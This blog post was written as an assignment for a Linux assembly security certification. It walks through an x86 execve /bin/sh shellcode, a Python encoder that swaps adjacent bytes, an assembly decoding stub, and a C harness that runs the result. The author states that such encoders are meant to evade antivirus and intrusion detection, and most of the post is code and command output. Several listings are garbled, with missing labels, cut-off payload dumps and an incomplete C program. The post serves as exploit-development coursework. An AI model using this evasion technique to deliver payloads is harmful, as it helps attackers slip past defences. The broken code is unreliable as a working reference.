Oleg's Web Log

Stochastic records on Information Security and IT in general

Custom encoding scheme in Assembly (SLAE, Assignment #4)

Category: Exploit development

Written on

The encoding and encryption notions are sometimes used interchangeably to describe a process of data transformation, while, in fact, there is a difference. The purpose of encoding is to transform data so that it can be properly consumed by a different type of system. Encoding transforms data into another format using a scheme that is publicly available and does not require a key. The purpose of encryption, on the other hand, is to transform data to keep it secret from others, so it can only be consumed by the intended recipient. Encryption usually transforms (encrypts/decrypts) data using a secret key, and the algorithm may or may not be publicly available.

I contemplated on what type of data transformation this post was going to tackle. Because there is no secret key involved and the shellcode is encrypted so it can be safely consumed by the decoding stub I decided that it would be proper to call it an encoding scheme.

The purpose of creating a custom encoding scheme in exploit development craft is to evade antiviruses and intrusion detection systems. When crafting one, keep in mind that its purpose is to fool, more often than not, signature-based software, not an intelligent live person who dedicated his life to breaking encryption algorithms. So it doesn't have to be too complicated.

To apply the encoding scheme to a shellcode one usually creates a separate encoder and a decoding stub, which becomes a part of a new shellcode and is used to decode the main encoded payload before transferring the execution flow to it.

Before describing the encoding scheme I came up with, let's first create a shellcode to work with. I will use the shell-starting shellcode:

section .text
    global _start

    xor eax, eax 
    push eax 
    push 0x68732f6e
    push 0x69622f2f
    mov ebx, esp        ; put string address into ebx
    xor ecx, ecx        ; args
    xor edx, edx        ; env vars
    mov al, 11
    int 80h 
nasm -f elf stacksh.asm && ld stacksh.o -o stacksh && ./stacksh
scdump stacksh

Output from the last command (formatted to fit the screen):

Length:  23
Payload: "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9"

The encoding scheme itself is super simple. It just exchanges position of two adjacent bytes. For it to work correctly, the shellcode length must be a multiple of 2. So, if it is not, the encoder appends a no-operation \x90 byte to satisfy the requirement. The encoder implementation in Python follows:

#!/usr/bin/env python

# Author: Oleg Mitrofanov (reider-roque) 2015

from itertools import cycle
import os.path
import sys

def hexlify(data): 
    return "".join("\\x{:02x}".format(ord(c)) for c in data)

def hexlify_nasm(data): 
    return "".join("0x{:02x},".format(ord(c)) for c in data)[:-1]

def unhexlify(data):
    return "".join([chr(int(num, 16)) for num in data[2:].split("\\x")])

script_name = os.path.basename(__file__)
if len(sys.argv) != 2:
    print("Error: invalid number of arguments")
    print("Usage:\n\t{} SHELLCODE".format(script_name)) 
    print("Example:\n\t{} '\\aa\\bb\\cc\\dd'".format(script_name))

cleartext = unhexlify(sys.argv[1])

if len(cleartext) % 2 != 0:
    cleartext += chr(0x90)

encrypted = ''
for i in range(0, len(cleartext), 2):
    encrypted += cleartext[i+1] + cleartext[i]

print('Standard:  {}'.format(hexlify(encrypted)))
print('NASM:      {}'.format(hexlify_nasm(encrypted)))

Let's encode the main payload:

./xchgencoder "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80"

Output (formatted to fit the screen):

Standard:  \xc0\x31\x68\x50\x2f\x6e\x68\x73\x2f\x68\x62\x2f\x89\x69\x31\xe3\x31
NASM:      0xc0,0x31,0x68,0x50,0x2f,0x6e,0x68,0x73,0x2f,0x68,0x62,0x2f,0x89,0x69,

After the encoded payload was ready all I needed to do was write the decoder stub in Assembly. The decoding stub first decodes the main payload and then jumps the execution to where the payload begins:

section .text
    global _start

    jmp .data
    pop esi             ; Point ESI to the beginning of the shellcode
    push shellcode_len  ; Put (shellcode length)/2 into ECX
    pop ecx
    xor eax, eax
    lodsw            ; load two shellcode bytes into EAX
    mov [esi-1], al  ; and switch them
    shr eax, 8
    mov [esi-2], al
    loop .decrypt    
    jmp shellcode

    call .code
    shellcode: db 0xc0,0x31,0x68,0x50,0x2f,0x6e,0x68,0x73,0x2f,0x68,0x62,0x2f
    sc_continued: db 0x89,0x69,0x31,0xe3,0x31,0xc9,0xb0,0xd2,0xcd,0x0b,0x90,0x80
    shellcode_len: equ ($-shellcode)/2

In the above code to make the long shellcode fit the screen and keep the code executable (in case you are copy-pasting), I divided it into two parts with the second titled sc_continued. In the actual source code it is just one long line of comma separated bytes titled shellcode.

It's time to build another binary and extract the resulting shellcode:

nasm -f elf xchgdecoder.asm && ld -o xchgdecoder xchgdecoder.o
scdump xchgdecoder


Length:  52
Payload: "\xeb\x15\x5e\x6a\x0c\x59\x31\xc0\x66\xad\x88\x46\xff\xc1\xe8\x08\x88"

Remember that if you try to run the ./xchgdecoder by itself you'll get segmentation fault as soon as your stub decoder tries to overwrite the first byte of the encrypted payload. Overwriting executable code of the .text section is prohibited by design and you can do nothing about it.

To test that the whole encoding business is actually working we'll need the help of a C language. Here is the source code that tests our shellcode:

#include <stdio.h>
#include <string.h>

unsigned char shellcode[] = "\xeb\x15\x5e\x6a\x0c\x59\x31\xc0\x66\xad\x88\x46\xff"

int main(void)
    printf("Shellcode length: %d\n", strlen(shellcode));


    return 0;

And that's how we build a binary out of it and run the result:

gcc -fno-stack-protector -z execstack -o scframe scframe.c

Working encoded shellcode

It works!

This blog post was created to fulfill the requirements of the SecurityTube Linux Assembly Expert certification. Student id: SLAE-685.

The source files created while completing the assignment can be found in my GitHub repository.

comments powered by Disqus